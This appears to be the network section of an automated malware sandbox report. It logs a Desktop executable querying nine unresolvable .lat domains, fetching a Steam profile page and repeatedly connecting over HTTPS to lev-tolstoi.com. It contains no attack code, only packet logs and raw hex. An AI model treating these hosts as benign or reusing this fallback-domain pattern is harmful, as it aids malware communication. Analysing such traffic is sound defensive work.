                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.569782019 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.569848061 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.569854975 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.584218025 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.584281921 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.584291935 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.628513098 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.681416035 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.722246885 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.722280025 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.769115925 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.771857977 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775609016 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775629044 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775698900 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775702000 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775748968 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775944948 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775960922 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775975943 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775981903 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.990916014 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.990973949 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.991035938 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.991389036 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.991400003 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.341840029 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.341952085 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.343451977 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.343483925 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.343755007 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.345305920 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.345508099 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.345552921 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.228852987 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.228956938 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.229077101 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.229366064 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.229386091 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.349504948 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.349556923 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.349652052 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.349992037 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.350006104 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.656027079 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.656109095 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.658361912 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.658381939 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.658678055 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.660005093 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.660161972 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.660200119 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.660260916 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.707350016 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521295071 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521379948 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521452904 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521725893 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521744013 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.839617968 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.839673042 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.839745045 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.840440989 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.840454102 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.144366980 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.144452095 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.146059036 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.146066904 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.146313906 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.147808075 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.147989035 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.148024082 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.148108006 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:27.148119926 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.115650892 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.115763903 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.115825891 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.116151094 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.116178036 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.676810980 CET49712443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.676851034 CET44349712172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.676933050 CET49712443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.677305937 CET49712443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.677326918 CET44349712172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:29.987974882 CET44349712172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:29.988081932 CET49712443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:29.989788055 CET49712443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:29.989805937 CET44349712172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:29.990046024 CET44349712172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:29.991377115 CET49712443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:29.991477013 CET49712443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:29.991486073 CET44349712172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:30.758481979 CET44349712172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:30.758572102 CET44349712172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:30.758651018 CET49712443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:30.758929968 CET49712443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:30.758946896 CET44349712172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:31.530109882 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:31.530169964 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:31.530329943 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:31.531390905 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:31.531409025 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.833549023 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.833657026 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.859971046 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.860002041 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.860316038 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.909801006 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.923496962 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.927510977 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.927571058 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.927866936 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.927900076 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.929292917 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.929342985 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.931441069 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.931474924 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.931678057 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.931701899 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.931854010 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.931881905 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.931890965 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.931905985 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.932074070 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.932099104 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.932118893 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.932346106 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.932369947 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.975343943 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.977876902 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.977917910 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.977942944 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.977962971 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.977988005 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.977998972 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.978029966 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:32.978043079 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.407990932 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.408077002 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.408137083 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.408343077 CET49715443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.408365011 CET44349715172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.423085928 CET49728443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.423186064 CET44349728172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.423304081 CET49728443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.423739910 CET49728443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                Dec 26, 2024 13:14:35.423754930 CET44349728172.67.157.254192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:36.082596064 CET49728443192.168.2.5172.67.157.254

                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.110455990 CET5690553192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.251796007 CET53569051.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.257086992 CET4959053192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.394157887 CET53495901.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.397561073 CET5993853192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.535290003 CET53599381.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.539036989 CET4979353192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.677242994 CET53497931.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.679081917 CET5626153192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.818259954 CET53562611.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.820807934 CET5698153192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.959492922 CET53569811.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.962681055 CET6198453192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.102869034 CET53619841.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.124074936 CET5899353192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.261384964 CET53589931.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.293004036 CET6336153192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.430372000 CET53633611.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.488277912 CET6405753192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.626596928 CET53640571.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.184479952 CET5309153192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.322398901 CET53530911.1.1.1192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.450432062 CET6019053192.168.2.51.1.1.1
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.675729990 CET53601901.1.1.1192.168.2.5

                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.110455990 CET192.168.2.51.1.1.10x82f3Standard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.257086992 CET192.168.2.51.1.1.10x8ad4Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.397561073 CET192.168.2.51.1.1.10x2724Standard query (0)slipperyloo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.539036989 CET192.168.2.51.1.1.10x5a89Standard query (0)manyrestro.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.679081917 CET192.168.2.51.1.1.10xdc8fStandard query (0)shapestickyr.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.820807934 CET192.168.2.51.1.1.10x1a7bStandard query (0)talkynicer.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.962681055 CET192.168.2.51.1.1.10x22adStandard query (0)curverpluch.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.124074936 CET192.168.2.51.1.1.10xe8bdStandard query (0)tentabatte.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.293004036 CET192.168.2.51.1.1.10x5908Standard query (0)bashfulacid.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.488277912 CET192.168.2.51.1.1.10x9cfaStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.184479952 CET192.168.2.51.1.1.10x467Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.450432062 CET192.168.2.51.1.1.10x931aStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.251796007 CET1.1.1.1192.168.2.50x82f3Name error (3)observerfry.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.394157887 CET1.1.1.1192.168.2.50x8ad4Name error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.535290003 CET1.1.1.1192.168.2.50x2724Name error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.677242994 CET1.1.1.1192.168.2.50x5a89Name error (3)manyrestro.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.818259954 CET1.1.1.1192.168.2.50xdc8fName error (3)shapestickyr.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:12.959492922 CET1.1.1.1192.168.2.50x1a7bName error (3)talkynicer.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.102869034 CET1.1.1.1192.168.2.50x22adName error (3)curverpluch.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.261384964 CET1.1.1.1192.168.2.50xe8bdName error (3)tentabatte.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.430372000 CET1.1.1.1192.168.2.50x5908Name error (3)bashfulacid.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:13.626596928 CET1.1.1.1192.168.2.50x9cfaNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.322398901 CET1.1.1.1192.168.2.50x467No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:16.322398901 CET1.1.1.1192.168.2.50x467No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.675729990 CET1.1.1.1192.168.2.50x931aNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 26, 2024 13:14:28.675729990 CET1.1.1.1192.168.2.50x931aNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                                                • lev-tolstoi.com

                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.549704104.102.49.2544435608C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-26 12:14:15 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                2024-12-26 12:14:15 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Date: Thu, 26 Dec 2024 12:14:15 GMT
                                                                                                                                                                                                                                Content-Length: 35121
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: sessionid=0d7841a6cf55f0a4ff486125; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                2024-12-26 12:14:15 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                2024-12-26 12:14:16 UTC16384INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
